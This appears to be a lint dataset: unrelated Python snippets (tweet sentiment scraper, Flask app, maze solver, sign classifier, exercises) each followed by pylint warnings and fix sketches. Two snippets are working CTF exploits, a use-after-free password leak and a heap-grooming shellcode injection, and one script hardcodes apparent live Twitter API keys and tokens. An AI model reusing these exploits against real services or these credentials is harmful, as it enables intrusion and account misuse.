58     # print ("Truncated:", tweet.truncated)
59     print ("\n\n")
60
61     csvWriter.writerow([tweet.id, tweet.user.name, tweet.user.screen_name, tweet.full_text,tweet.created_at, tweet.favorite_count, tweet.retweet_count, res])
62     csvWriter.writerow([])
63     limit = limit + 1
64     if limit == 25:
65       break
66
67 print ("Done")
68
69 print ("\n\n\n")
70 total = positive+negative+neutral
71 positivePercent = 100*(positive/total)
72 negativePercent = 100*(negative/total)
73 neutralPercent = 100*(neutral/total)
74
75 print ("Positive tweets: {} %".format(positivePercent))
76 print ("Negative tweets: {} %".format(negativePercent))
77 print ("Neutral tweets: {} %".format(neutralPercent))
78
79
80
81 # infile = 'tweets.csv'
82
83 # with open(infile, 'r') as csvfile:
84 #     rows = csv.reader(csvfile)
85 #     for row in rows:
86 #         sentence = row[3]
87 #         blob = TextBlob(sentence)
88 #         print (blob.sentiment)
89
90
91 labels = 'Neutral', 'Positive', 'Negative'
92 sizes = []
93 sizes.append(neutralPercent)
94 sizes.append(positivePercent)
95 sizes.append(negativePercent)
96 colors = ['lightskyblue','yellowgreen', 'lightcoral']
97 explode = (0.0, 0, 0)  # explode 1st slice
98
99 # Plot
100 plt.pie(sizes, explode=explode, labels=labels, colors=colors,
101     autopct='%1.1f%%', shadow=False, startangle=140)
102 plt.suptitle("Sentiment Analysis of {} tweets related to {}".format(limit, tag))
103 plt.axis('equal')
104 plt.show()
105
34 - warning: bad-indentation 65 - warning: bad-indentation 18 - warning: unspecified-encoding 18 - refactor: consider-using-with 3 - warning: unused-import
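For the unspecified-encoding and consider-using-with warnings, a sketch of the file handling with a context manager and an explicit encoding (keeping the original filename):

    import csv

    # the with-block closes the file even if an exception occurs; newline=''
    # is the csv module's recommended setting for output files
    with open('tweets.csv', 'w+', encoding='utf-8', newline='') as csv_file:
        csv_writer = csv.writer(csv_file)
        csv_writer.writerow(["ID", "Username", "Twitter @", "Tweet"])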
1 from flask import Flask, render_template, request 2 from test import mining 3 app = Flask(__name__) 4 5 @app.route('/') 6 def index(): 7 return render_template('hello.html') 8 9 10 @app.route('/', methods=['GET', 'POST']) 11 def submit(): 12 if request.method == 'POST': 13 print (request.form) # debug line, see data printed below 14 tag = request.form['tag'] 15 limit = request.form['limit'] 16 # msg = tag+" "+limit 17 sen_list = mining(tag,limit) 18 msg = "Positive Percent = "+sen_list[0]+"% <br>Negative Percent = "+sen_list[1]+"% <br>Neutral Percent = "+sen_list[2]+"%" 19 return ""+msg 20 21 if __name__ == '__main__': 22 app.run(debug = True) 23 24 print("This")
7 - warning: bad-indentation 12 - warning: bad-indentation 13 - warning: bad-indentation 14 - warning: bad-indentation 15 - warning: bad-indentation 17 - warning: bad-indentation 18 - warning: bad-indentation 19 - warning: bad-indentation 22 - warning: bad-indentation 2 - error: no-name-in-module 19 - error: possibly-used-before-assignment
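The possibly-used-before-assignment error appears because msg is bound only inside the POST branch while the return sits at function level; a sketch of one fix, initialising msg up front:

    from flask import Flask, request

    app = Flask(__name__)

    @app.route('/', methods=['GET', 'POST'])
    def submit():
        msg = ""  # default value, so every code path defines msg
        if request.method == 'POST':
            tag = request.form['tag']
            limit = request.form['limit']
            msg = tag + " " + limit
        return msg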
1 import csv 2 csvFile = open('res.csv', 'w+')
2 - warning: unspecified-encoding 2 - refactor: consider-using-with 1 - warning: unused-import
1 #!/usr/bin/env python 2 3 print ("some output") 4 return "hello"
4 - error: return-outside-function
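A return statement is only legal inside a function body, hence the return-outside-function error; a sketch of the wrapped version:

    #!/usr/bin/env python

    def greet():
        print("some output")
        return "hello"  # legal here, because we are inside a function

    print(greet())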
1 import matplotlib.pyplot as plt 2 3 # Data to plot 4 labels = 'Neutral', 'Positive', 'Negative' 5 sizes = [20, 40, 40] 6 colors = ['lightskyblue','yellowgreen', 'lightcoral'] 7 explode = (0.0, 0, 0) # explode 1st slice 8 9 # Plot 10 plt.pie(sizes, explode=explode, labels=labels, colors=colors, 11 autopct='%1.1f%%', shadow=True, startangle=140) 12 13 plt.axis('equal') 14 # plt.title('Sentiment analysis') 15 plt.suptitle('Analysing n tweets related to #') 16 plt.show()
Clean Code: No Issues Detected
1 import tweepy 2 import csv 3 import pandas as pd 4 5 6 # keys and tokens from the Twitter Dev Console 7 consumer_key = 'FgCG8zcxF4oINeuAqUYzOw9xh' 8 consumer_secret = 'SrSu7WhrYUpMZnHw7a5ui92rUA1n2jXNoZVb3nJ5wEsXC5xlN9' 9 access_token = '975924102190874624-uk5zGlYRwItkj7pZO2m89NefRm5DFLg' 10 access_token_secret = 'ChvmTjG8hl61xUrXkk3AdKcXMlvAKf4ise1kIQLKsnPu4' 11 12 #Twitter only allows access to a user's most recent 3240 tweets with this method 13 14 #authorize twitter, initialize tweepy 15 auth = tweepy.OAuthHandler(consumer_key, consumer_secret) 16 auth.set_access_token(access_token, access_token_secret) 17 api = tweepy.API(auth) 18 19 #initialize a list to hold all the tweepy Tweets 20 alltweets = [] 21 22 #make initial request for most recent tweets (200 is the maximum allowed count) 23 new_tweets = api.search(q="#DonaldTrump",count=200,tweet_mode="extended") 24 25 #save most recent tweets 26 alltweets.extend(new_tweets) 27 28 #save the id of the oldest tweet less one 29 # oldest = alltweets[-1].id - 1 30 #keep grabbing tweets until there are no tweets left to grab 31 while len(new_tweets) > 0: 32 # print "getting tweets before %s" % (oldest) 33 34 #all subsequent requests use the max_id param to prevent duplicates 35 new_tweets = api.search(q="#DonaldTrump",count=200,tweet_mode="extended") 36 37 #save most recent tweets 38 alltweets.extend(new_tweets) 39 40 #update the id of the oldest tweet less one 41 oldest = alltweets[-1].id - 1 42 43 # print "...%s tweets downloaded so far" % (len(alltweets)) 44 45 #transform the tweepy tweets into a 2D array that will populate the csv 46 outtweets = [[tweet.id_str, tweet.created_at, tweet.full_text.encode("utf-8"), tweet.retweet_count, tweet.favorite_count] for tweet in alltweets] 47 48 #write the csv 49 with open('tweets.csv', 'w+') as f: 50 writer = csv.writer(f) 51 writer.writerow(["id","created_at","full_text","retweet_count","favorite_count"]) 52 writer.writerows(outtweets) 53
50 - warning: bad-indentation 51 - warning: bad-indentation 52 - warning: bad-indentation 49 - warning: unspecified-encoding 3 - warning: unused-import
1 from test import mining 2 tag = "#WednesdayWisdom" 3 limit = "10" 4 sen_list = mining(tag,int(limit)) 5 print(sen_list)
1 - error: no-name-in-module
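pylint resolves `from test import mining` against the standard-library test package, which has no mining member, hence no-name-in-module; giving the local module a non-colliding name avoids the clash (the module name below is hypothetical):

    # 'sentiment_mining' is a hypothetical rename of the local test.py
    from sentiment_mining import mining

    tag = "#WednesdayWisdom"
    limit = "10"
    sen_list = mining(tag, int(limit))
    print(sen_list)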
1 #!/usr/bin/env python 2 3 import socket 4 from struct import pack, unpack 5 6 DEBUG = False 7 8 server = "shitsco_c8b1aa31679e945ee64bde1bdb19d035.2014.shallweplayaga.me" 9 server = "127.0.0.1" 10 port = 31337 11 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 12 s.connect((server, port)) 13 s.settimeout(30) 14 15 def recv_until(s, pattern): 16 ret = '' 17 while True: 18 c = s.recv(1) 19 if c == '': 20 raise Exception("Connection closed") 21 ret += c 22 if ret.find(pattern) != -1: 23 break 24 return ret 25 26 # trigger use-after-free by creating 2 items and then removing them in order 27 print recv_until(s, "$ ") 28 print "set 1 abcd" 29 s.send("set 1 abcd\n") 30 print recv_until(s, "$ ") 31 print "set 2 abcd" 32 s.send("set 2 abcd\n") 33 print recv_until(s, "$ ") 34 print "set 1" 35 s.send("set 1\n") 36 print recv_until(s, "$ ") 37 print "set 2" 38 s.send("set 2\n") 39 print recv_until(s, "$ ") 40 41 42 print "show <pointers>" 43 # set use-after-free item via strdup of argument to 'show' command 44 # first two items are the key,value pair followed by blink and flink 45 # use a pointer to the string "password" in the code section for the key (0x80495d0) 46 # use the location of the password in bss for the value (0x804c3a0) 47 # use something to terminate the linked list for flink and blink 48 # - can't use null directly here since the strdup allocation would be cut short (must be 16 bytes to re-use the free'd block) 49 # - just use a pointer to some nulls in bss instead (0x804c390) 50 s.send("show " + pack("<IIII", 0x80495d0, 0x804C3A0, 0x804C390, 0x0804C390) + "\n") 51 print recv_until(s, "$ ") 52 53 # now, this will simply dump the password for us 54 print "show" 55 s.send("show\n") 56 a = recv_until(s, ': ') 57 pw = recv_until(s, '\n')[:-1] 58 b = recv_until(s, "$ ") 59 print a + pw + '\n' + b 60 61 print 'Enable password: "' + pw + '"' 62 63 print "enable " + pw 64 s.send('enable ' + pw + '\n') 65 66 print recv_until(s, "# ") 67 print "flag" 68 s.send('flag\n') 69 print recv_until(s, "# ") 70 print "quit" 71 s.send('quit\n')
27 - error: syntax-error
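The single syntax-error is all pylint reports because the script is Python 2: the first print statement (line 27) aborts parsing under the Python 3 grammar before any other check can run. A sketch of the Python 3 spelling of the opening interaction, keeping the original host and port:

    import socket

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("127.0.0.1", 31337))
    print("set 1 abcd")       # print is a function in Python 3
    s.send(b"set 1 abcd\n")   # and sockets send bytes, not str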
1 #!/usr/bin/env python 2 3 import socket, subprocess, sys 4 from struct import pack, unpack 5 6 global scenes 7 global officers 8 9 scenes = {} 10 officers = {} 11 12 remote = len(sys.argv) > 1 13 14 PORT = 8888 15 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 16 if remote: 17 HOST = "dosfun4u_5d712652e1d06a362f7fc6d12d66755b.2014.shallweplayaga.me" 18 else: 19 HOST = '127.0.0.1' 20 21 def chksum(data): 22 ret = 0 23 for d in data: 24 ret += ord(d) 25 return ret & 0xffff 26 27 def add_officer(officer_id, status=0, x=0, y=0): 28 global officers 29 print 'update' if officers.has_key(officer_id) and officers[officer_id] else 'add', 'officer', hex(officer_id) 30 officers[officer_id] = True 31 payload = pack('H', 0x7d0) 32 payload += pack('H', officer_id) 33 payload += pack('H', status) 34 payload += pack('H', x) 35 payload += pack('H', y) 36 payload += pack('H', 0x0) 37 return payload 38 39 def remove_officer(officer_id): 40 global officers 41 print 'remove officer', hex(officer_id), 'should work' if officers.has_key(officer_id) and officers[officer_id] else 'should fail' 42 officers[officer_id] = False 43 payload = pack('H', 0xbb8) 44 payload += pack('H', officer_id) 45 return payload 46 47 def add_scene(scene_id, data2, data3, inline_data='', x=0, y=0): 48 global scenes 49 print 'update' if scenes.has_key(scene_id) and scenes[scene_id] else 'add', 'scene', hex(scene_id) 50 scenes[scene_id] = True 51 size1 = len(inline_data)/2 52 size2 = len(data2) 53 size3 = len(data3) 54 payload = pack('H', 0xfa0) 55 payload += pack('H', scene_id) 56 payload += pack('H', x) 57 payload += pack('H', y) 58 payload += pack('B', size1) 59 payload += pack('B', size2) 60 payload += pack('H', size3) 61 payload += pack('H', 0) 62 payload += inline_data[:size1*2] 63 payload += data2 64 payload += data3 65 return payload 66 67 def recv_all(s, size): 68 ret = [] 69 received = 0 70 while size > received: 71 c = s.recv(size-received) 72 if c == '': 73 raise Exception('Connection closed') 74 ret.append(c) 75 received += len(c) 76 return ''.join(ret) 77 78 def recv_until(s, pattern): 79 ret = '' 80 while True: 81 c = s.recv(1) 82 if c == '': 83 raise Exception("Connection closed") 84 ret += c 85 if ret.find(pattern) != -1: 86 break 87 return ret 88 89 s.connect((HOST, PORT)) 90 91 if remote: 92 print s.recv(4096) 93 buf = s.recv(4096) 94 print buf 95 data = buf.split(' ')[0] 96 print 'challenge = {}'.format(data) 97 print 'hashcatting...' 98 p = subprocess.Popen(['./hashcat', data], stdout=subprocess.PIPE); 99 result = p.communicate()[0].strip('\n\r\t ') 100 print 'response = {}'.format(result) 101 s.send(result) 102 103 def send_cmd(s,payload,recvLen=0): 104 payload += pack('H', chksum(payload)) 105 s.send(payload) 106 return recv_all(s, recvLen) 107 108 shellcode = open('shellcode', 'rb').read() 109 110 print 'Getting block into free-list' 111 send_cmd(s,add_officer(1),5) 112 send_cmd(s,remove_officer(1),5) 113 print 'Adding officer to reuse block from free-list' 114 send_cmd(s,add_officer(0xc),5) 115 print 'Writing shellcode to 008f:0000' 116 send_cmd(s,add_scene(1, pack("<HHHHHH", 0xc, 0, 0x4688, 0x8f, 0, 0), shellcode),5) 117 print 'Modifying officer structure to include pointer to fake officer on stack' 118 send_cmd(s,add_scene(2, pack("<HHHHHH", 1, 0, 0, 0, 0x47aa, 0x011f), "lolololol"),5) 119 print 'Writing return to shellcode on stack' 120 send_cmd(s,add_officer(0x945, 0x1d26, 0x10, 0x97),5) 121 122 print 'Receiving response...' 
123 print 'Key 1:', recv_until(s,'\n').replace('\x00', '')[:-1] 124 print 'Key 2:', recv_until(s,'\n')[:-1]
29 - error: syntax-error
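Same cause as above: line 29 combines a Python 2 print statement with a conditional expression, so parsing stops there. Note that dict.has_key() was also removed in Python 3, where the in operator replaces it; a sketch:

    officers = {}
    officer_id = 1
    # Python 3: print is a function and has_key() is gone
    print('update' if officer_id in officers and officers[officer_id] else 'add',
          'officer', hex(officer_id))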
1 import tkinter as tk 2 from tkinter import filedialog 3 from tkinter import * 4 from PIL import Image, ImageTk 5 import numpy 6 from keras.models import load_model 7 model = load_model('BienBao.h5') 8 class_name = { 9 1:'Speed limit (20km/h)', 10 2:'Speed limit (30km/h)', 11 3:'Speed limit (50km/h)', 12 4:'Speed limit (60km/h)', 13 5:'Speed limit (70km/h)', 14 6:'Speed limit (80km/h)', 15 7:'End of speed limit (80km/h)', 16 8:'Speed limit (100km/h)', 17 9:'Speed limit (120km/h)', 18 10:'No passing', 19 11:'No passing veh over 3.5 tons', 20 12:'Right-of-way at intersection', 21 13:'Priority road', 22 14:'Yield', 23 15:'Stop', 24 16:'No vehicles', 25 17:'Veh > 3.5 tons prohibited', 26 18:'No entry', 27 19:'General caution', 28 20:'Dangerous curve left', 29 21:'Dangerous curve right', 30 22:'Double curve', 31 23:'Bumpy road', 32 24:'Slippery road', 33 25:'Road narrows on the right', 34 26:'Road work', 35 27:'Traffic signals', 36 28:'Pedestrians', 37 29:'Children crossing', 38 30:'Bicycles crossing', 39 31:'Beware of ice/snow', 40 32:'Wild animals crossing', 41 33:'End speed + passing limits', 42 34:'Turn right ahead', 43 35:'Turn left ahead', 44 36:'Ahead only', 45 37:'Go straight or right', 46 38:'Go straight or left', 47 39:'Keep right', 48 40:'Keep left', 49 41:'Roundabout mandatory', 50 42:'End of no passing', 51 43:'End no passing veh > 3.5 tons' 52 } 53 54 top=tk.Tk() 55 top.geometry('800x600') 56 top.title('Traffic sign classification') 57 top.configure(background='#CDCDCD') 58 label = Label(top, background = '#CDCDCD', font=('arial',15,'bold')) 59 label.place(x=0, y=0, relwidth = 1, relheight = 1) 60 61 sign_image = Label(top) 62 def classify(file_path): 63 global label_packed 64 image = Image.open(file_path) 65 image = image.resize((30, 30)) 66 image = numpy.expand_dims(image, axis=0) 67 image = numpy.array(image) 68 print(image.shape) 69 pred = model.predict_classes([image])[0] 70 sign = class_name[pred+1] 71 print(sign) 72 label.configure(foreground = '#011638', text = sign) 73 74 75 def show_classify_button(file_path): 76 classify_button = Button(top,text='Classify', command = lambda : classify(file_path), padx=10, pady=5) 77 classify_button.configure(background='GREEN', foreground = 'white', font = ('arial', 10, 'bold')) 78 classify_button.place(relx = 0.79, rely = 0.46) 79 80 def upload_image(): 81 try: 82 file_path = filedialog.askopenfilename() 83 uploaded = Image.open(file_path) 84 uploaded.thumbnail(((top.winfo_width()/2.25), 85 (top.winfo_height()/2.25))) 86 im = ImageTk.PhotoImage(uploaded) 87 sign_image.configure(image= im) 88 sign_image.image = im 89 label.configure(text='') 90 show_classify_button(file_path) 91 except: 92 pass 93 94 upload = Button(top, text='Upload an image', command=upload_image, padx = 10, pady = 5) 95 upload.configure(background='#364156', foreground = 'white', font = ('arial', 10, 'bold')) 96 97 upload.pack(side = BOTTOM, pady = 50) 98 sign_image.pack(side=BOTTOM, expand = True) 99 label.pack(side = BOTTOM, expand = True) 100 heading = Label(top, text = 'Your traffic sign', pady = 20, font = ('arial', 20, 'bold')) 101 heading.configure(background = '#CDCDCD', foreground = '#364156') 102 heading.pack() 103 top.mainloop()
3 - warning: wildcard-import 63 - warning: global-variable-not-assigned 91 - warning: bare-except 3 - warning: unused-wildcard-import
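A sketch addressing the wildcard-import and bare-except warnings: import only the tkinter names you use, and catch a concrete exception class (OSError here is an assumption about what the file dialog flow can raise):

    from tkinter import filedialog  # explicit import instead of 'from tkinter import *'

    def upload_image():
        try:
            file_path = filedialog.askopenfilename()
            print(file_path)
        except OSError as err:      # a concrete class instead of a bare except
            print("could not open file:", err)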
1 def switch(on_strike): 2 players = {1,2} 3 return list(players.difference(set([on_strike])))[0] 4 5 6 def get_player(previous_score, previous_player, previous_bowl_number): 7 if previous_score%2 == 0 and (previous_bowl_number%6 !=0 or previous_bowl_number ==0): 8 player = previous_player 9 elif previous_score%2 != 0 and previous_bowl_number % 6 == 0: 10 player = previous_player 11 else: 12 player = switch(previous_player) 13 return player 14 15 16 17 a = [1, 2, 0, 0, 4, 1, 6, 2, 1, 3] 18 player_turns = [] 19 player_score_chart = {1:0, 2:0} 20 total_score = 0 21 22 previous_score=0 23 previous_player=1 24 previous_bowl_number=0 25 26 for runs in a: 27 player_turns.append(get_player(previous_score, previous_player, previous_bowl_number)) 28 previous_bowl_number+=1 29 previous_score=runs 30 previous_player=player_turns[-1] 31 player_score_chart[previous_player] += previous_score 32 total_score += previous_score 33 34 print 'Total Score : ', total_score 35 print 'Batsman 1 Score : ', player_score_chart[1] 36 print 'Batsman 2 Score : ', player_score_chart[2]
34 - error: syntax-error
1 n=int(input("enter how many numbers you want to print:")) 2 for i in range(1,n+1): 3 if(i%3==0): 4 print ('Fizz') 5 continue 6 elif(i%5==0): 7 print ('Buzz') 8 continue 9 print i 10 11
9 - error: syntax-error
1 arr=[1,2,3,5,8,4,7,9,1,4,12,5,6,5,2,1,0,8,1] 2 a = [None] * len(arr); 3 visited = 0; 4 for i in range(0, len(arr)): 5 count = 1; 6 for j in range(i+1, len(arr)): 7 if(arr[i] == arr[j]): 8 count = count + 1; 9 a[j] = visited; 10 if(a[i] != visited): 11 a[i] = count; 12 for i in range(0, len(a)): 13 if(a[i] != visited): 14 print(" "+ str(arr[i]) +" has occurred "+ str(a[i])+" times");
2 - warning: unnecessary-semicolon 3 - warning: unnecessary-semicolon 5 - warning: unnecessary-semicolon 8 - warning: unnecessary-semicolon 9 - warning: unnecessary-semicolon 11 - warning: unnecessary-semicolon 14 - warning: unnecessary-semicolon
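The semicolons are harmless but un-Pythonic, which is all pylint objects to; for the counting itself, collections.Counter gives the same output with far less bookkeeping (a swapped-in technique, not the original nested-loop algorithm):

    from collections import Counter

    arr = [1, 2, 3, 5, 8, 4, 7, 9, 1, 4, 12, 5, 6, 5, 2, 1, 0, 8, 1]
    # Counter tallies every distinct value in one pass, in first-seen order
    for value, count in Counter(arr).items():
        print(" " + str(value) + " has occurred " + str(count) + " times")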
1 def returnSum(dict): 2 sum=0 3 for i in dict: 4 sum=sum+dict[i] 5 return sum 6 dict={'Rick':85,'Amit':42,'George':53,'Tanya':60,'Linda':35} 7 print 'sum:', returnSum(dict)
7 - error: syntax-error
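Besides the Python 2 print that triggers the syntax-error, the snippet shadows the built-in names dict and sum; a Python 3 sketch without the shadowing:

    def return_sum(scores):  # parameter name avoids shadowing dict/sum
        return sum(scores.values())

    marks = {'Rick': 85, 'Amit': 42, 'George': 53, 'Tanya': 60, 'Linda': 35}
    print('sum:', return_sum(marks))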
1 # represent the "board" in code 2 3 # dependencies 4 import random 5 6 class Board: 7 def __init__(self, width=10): 8 self.width = width 9 self.height = width * 2 10 11 self.WALL_CHANCE = .25 12 self.FLOOR_CHANCE = .15 13 14 # create the grid 15 self.create_random_grid() 16 17 def create_random_grid(self): 18 # reset old grid 19 self.grid = [] 20 21 # generate cells for new grid 22 for i in range(self.width * self.height): 23 # is the cell at the left, right, top, or bottom? 24 is_left = True if i % self.width == 0 else False 25 is_right = True if i % self.width == self.width-1 else False 26 is_top = True if i < self.width else False 27 is_bottom = True if i > (self.width * self.height - self.width) else False 28 29 # create the cell 30 cell = { 31 "left" : is_left, 32 "right" : is_right, 33 "roof" : is_top, 34 "floor" : is_bottom, 35 "ID" : i 36 } 37 38 # append to grid 39 self.grid.append(cell) 40 41 # randomly generate walls 42 total = self.width * self.height 43 horizontal_amount = int(total * self.FLOOR_CHANCE) 44 verticle_amount = int(total * self.WALL_CHANCE) 45 46 # generate the walls 47 for _i in range(verticle_amount): 48 random_index = random.randrange(0, total) 49 50 adding_num = -1 if random_index == total - 1 else 1 51 first = "right" if adding_num == 1 else "left" 52 second = "right" if first == "left" else "left" 53 54 self.grid[random_index][first] = True 55 self.grid[random_index + adding_num][second] = True 56 57 # generate the floors 58 for _i in range(horizontal_amount): 59 random_index = random.randrange(0, total) 60 61 adding_num = self.width * -1 if random_index > (total - self.width) else self.width 62 first = "floor" if adding_num == self.width else "roof" 63 second = "floor" if first == "roof" else "roof" 64 65 self.grid[random_index][first] = True 66 self.grid[random_index + adding_num - 1][second] = True 67 68 69 def can_move_from(self, cell_index): 70 # TODO this works but its a lot of repeated code. Can it be made better? 
71 72 # can you move left 73 can_move_left = False 74 is_left = True if cell_index % self.width == 0 else False 75 if not is_left and self.grid[cell_index]["left"] == False: 76 left_cell = self.grid[cell_index - 1] 77 is_wall_left = True if left_cell["right"] == True else False 78 can_move_left = True if not is_wall_left else False 79 80 # can you move right 81 can_move_right = False 82 is_right = True if cell_index % self.width == self.width-1 else False 83 if not is_right and self.grid[cell_index]["right"] == False: 84 right_cell = self.grid[cell_index + 1] 85 is_wall_right = True if right_cell["left"] == True else False 86 can_move_right = True if not is_wall_right else False 87 88 # can you move up 89 can_move_up = False 90 is_top = True if cell_index < self.width else False 91 if not is_top and self.grid[cell_index]["roof"] == False: 92 top_cell = self.grid[cell_index - self.width] 93 is_wall_top = True if top_cell["floor"] == True else False 94 can_move_up = True if not is_wall_top else False 95 96 # can you move down 97 can_move_down = False 98 is_bottom = True if cell_index > (self.width * self.height - self.width) else False 99 if not is_bottom and self.grid[cell_index]["floor"] == False: 100 bottom_cell = self.grid[cell_index + self.width] 101 is_wall_bottom = True if bottom_cell["roof"] == True else False 102 can_move_down = True if not is_wall_bottom else False 103 104 # return the results 105 return can_move_left, can_move_right, can_move_up, can_move_down 106 107 def BFS(self): 108 """breadth first search to find the quickest way to the bottom""" 109 start_i = random.randrange(0,self.width) 110 paths = [ [start_i] ] 111 solved = False 112 dead_ends = [] 113 114 while not solved: 115 for path in paths: 116 # find all possibles moves from path 117 if len(dead_ends) >= len(paths) or len(paths) > 10000: # TODO this solution sucks 118 return False, False 119 120 # NOTE order is left right up down 121 if path[-1] >= (self.width * self.height - self.width): 122 solved = True 123 return paths, paths.index(path) 124 125 possible_moves = self.can_move_from(path[-1]) 126 127 if True in possible_moves: 128 move_order = [-1, 1, (self.width) * -1, self.width] 129 first_append_flag = False 130 origonal_path = path.copy() 131 for i in range(4): 132 possible_move = possible_moves[i] 133 if possible_move: 134 move = move_order[i] 135 136 next_index = origonal_path[-1] + move 137 if not next_index in origonal_path: 138 139 if not first_append_flag: 140 path.append(next_index) 141 first_append_flag = True 142 else: 143 new_path = origonal_path.copy() 144 new_path.append(next_index) 145 paths.append(new_path) 146 if not first_append_flag: 147 dead_ends.append(paths.index(path)) 148 else: 149 dead_ends.append(paths.index(path)) 150 151 152 153 def pretty_print_BFS(self, path): 154 for i in range(self.width * self.height): 155 cell = self.grid[i] 156 in_path = True if cell["ID"] in path else False 157 158 number_str = str(i) 159 160 if len(number_str) == 1: 161 number_str += " " 162 elif len(number_str) == 2: 163 number_str += " " 164 165 end_str = "\n" if i % self.width == self.width-1 else " " 166 167 if in_path: 168 print('\033[92m' + number_str + '\033[0m', end=end_str) 169 else: 170 print(number_str, end=end_str) 171 print(path) 172 173 174 175 176 if __name__ == "__main__": 177 b = Board(10) 178 179 paths, index = b.BFS() 180 181 if paths and index: 182 b.pretty_print_BFS(paths[index]) 183 else: 184 print('ljfdsakfdl') 185 186 # can_move_left, can_move_right, can_move_up, can_move_down = 
b.can_move_from(0) 187 188 # print("can_move_left ", can_move_left) 189 # print("can_move_right ", can_move_right) 190 # print("can_move_up ", can_move_up) 191 # print("can_move_down ", can_move_down)
70 - warning: fixme 117 - warning: fixme 24 - refactor: simplifiable-if-expression 25 - refactor: simplifiable-if-expression 26 - refactor: simplifiable-if-expression 27 - refactor: simplifiable-if-expression 69 - refactor: too-many-locals 74 - refactor: simplifiable-if-expression 77 - refactor: simplifiable-if-expression 78 - refactor: simplifiable-if-expression 82 - refactor: simplifiable-if-expression 85 - refactor: simplifiable-if-expression 86 - refactor: simplifiable-if-expression 90 - refactor: simplifiable-if-expression 93 - refactor: simplifiable-if-expression 94 - refactor: simplifiable-if-expression 98 - refactor: simplifiable-if-expression 101 - refactor: simplifiable-if-expression 102 - refactor: simplifiable-if-expression 110 - warning: redefined-outer-name 145 - warning: modified-iterating-list 114 - refactor: too-many-nested-blocks 107 - refactor: inconsistent-return-statements 156 - refactor: simplifiable-if-expression
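Most of the simplifiable-if-expression warnings share one pattern: a comparison already evaluates to a bool, so wrapping it in `True if ... else False` is redundant. A sketch of the edge tests written directly:

    def edge_flags(i, width, height):
        # each comparison is already a boolean; no ternary needed
        is_left = i % width == 0
        is_right = i % width == width - 1
        is_top = i < width
        is_bottom = i > (width * height - width)
        return is_left, is_right, is_top, is_bottom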
1 # use pygame to show the board on a window 2 3 # dependencies 4 import pygame, random 5 6 class Window: 7 def __init__(self, board): 8 # init py game 9 pygame.init() 10 11 # width height 12 self.WIDTH = 600 13 self.HEIGHT = 600 14 15 # diffenet display modes 16 self.display_one = False 17 self.display_all = False 18 19 # place holder 20 self.solution = [] 21 self.display_all_c = 0 22 23 # the board to display on the window 24 self.board = board 25 26 # define the dimensions of the cells of the board 27 self.cell_width = self.WIDTH // self.board.width 28 29 # define the left padding for the grid 30 total_width = self.cell_width * self.board.width 31 self.left_padding = (self.WIDTH - total_width) // 2 32 33 34 # colors 35 self.COLORS = { 36 "BLACK" : (255, 255, 255), 37 "GREY" : (230, 230, 230), 38 "BLUE" : (0, 0, 255), 39 "RED" : (255, 0, 0), 40 "YELLOW" : (212, 175, 55) 41 } 42 43 def create_random_color(self): 44 return (random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)) 45 46 def create_window(self): 47 # define window 48 self.WIN = pygame.display.set_mode( (self.WIDTH, self.HEIGHT) ) 49 50 # name window 51 pygame.display.set_caption("LIGHT NING") 52 53 # logo/icon for window 54 logo = pygame.image.load("images/logo.png") 55 pygame.display.set_icon(logo) 56 57 def get_BFS(self): 58 solved = False 59 while not solved: 60 self.board.create_random_grid() 61 paths, index = self.board.BFS() 62 63 if paths != False and index != False: 64 self.solution = paths[index] 65 solved = True 66 67 self.paths = paths 68 self.solution_i = index 69 70 def draw_grid_solution(self): 71 fflag = True 72 for i in range(self.board.width * self.board.height): 73 if not i in self.solution: continue 74 75 # might not work 76 col_num = i % self.board.width 77 row_num = i // self.board.width 78 79 x_pos = self.left_padding + (col_num * self.cell_width) 80 y_pos = row_num * self.cell_width 81 82 # define rect 83 r = pygame.Rect(x_pos, y_pos, self.cell_width, self.cell_width) 84 85 # draw the rectangle 86 pygame.draw.rect(self.WIN, self.COLORS["YELLOW"], r) 87 88 def draw_BFS(self): 89 if self.display_all_c >= len(self.paths): 90 self.display_all_c = 0 91 92 # generate a color for each path 93 path_colors = [] 94 for path in self.paths: 95 path_colors.append(self.create_random_color()) 96 path_colors[-1] = (0, 0 ,0) 97 98 temp = self.paths.pop(self.display_all_c) 99 self.paths.append(temp) 100 101 for path in self.paths: 102 for i in path: 103 # might not work 104 col_num = i % self.board.width 105 row_num = i // self.board.width 106 107 x_pos = self.left_padding + (col_num * self.cell_width) 108 y_pos = row_num * self.cell_width 109 110 # define rect 111 r = pygame.Rect(x_pos, y_pos, self.cell_width, self.cell_width) 112 113 # draw the rectangle 114 pygame.draw.rect(self.WIN, path_colors[self.paths.index(path)], r) 115 116 self.display_all_c += 1 117 118 119 def draw_window(self): 120 self.WIN.fill(self.COLORS["GREY"]) 121 122 if self.display_one: 123 self.draw_grid_solution() 124 elif self.display_all: 125 self.draw_BFS() 126 127 pygame.display.update() 128 129 def main(self): 130 # create window 131 self.create_window() 132 133 self.running = True 134 while self.running: 135 for event in pygame.event.get(): 136 if event.type == pygame.QUIT: 137 self.running = False 138 139 elif event.type == pygame.KEYDOWN: 140 if event.key == pygame.K_0: 141 self.get_BFS() 142 elif event.key == pygame.K_1: 143 # toggle display one 144 self.display_one = not self.display_one 145 if self.display_one: 146 
self.display_all = False 147 elif event.key == pygame.K_2: 148 # toggle display all 149 self.display_all = not self.display_all 150 if self.display_all: 151 self.display_all_c = 0 152 self.display_one = False 153 154 self.draw_window() 155 156 if __name__ == "__main__": 157 win = Window() 158 159 win.main()
6 - refactor: too-many-instance-attributes 71 - warning: unused-variable 48 - warning: attribute-defined-outside-init 67 - warning: attribute-defined-outside-init 68 - warning: attribute-defined-outside-init 133 - warning: attribute-defined-outside-init 137 - warning: attribute-defined-outside-init 157 - error: no-value-for-parameter
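The no-value-for-parameter error is the `Window()` call in the __main__ block: __init__ requires a board argument. A sketch of the entry point, assuming the lib.board/lib.window layout used by the project's runner script:

    from lib.board import Board
    from lib.window import Window

    if __name__ == "__main__":
        board = Board(10)      # Window.__init__ needs a board to display
        win = Window(board)
        win.main()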
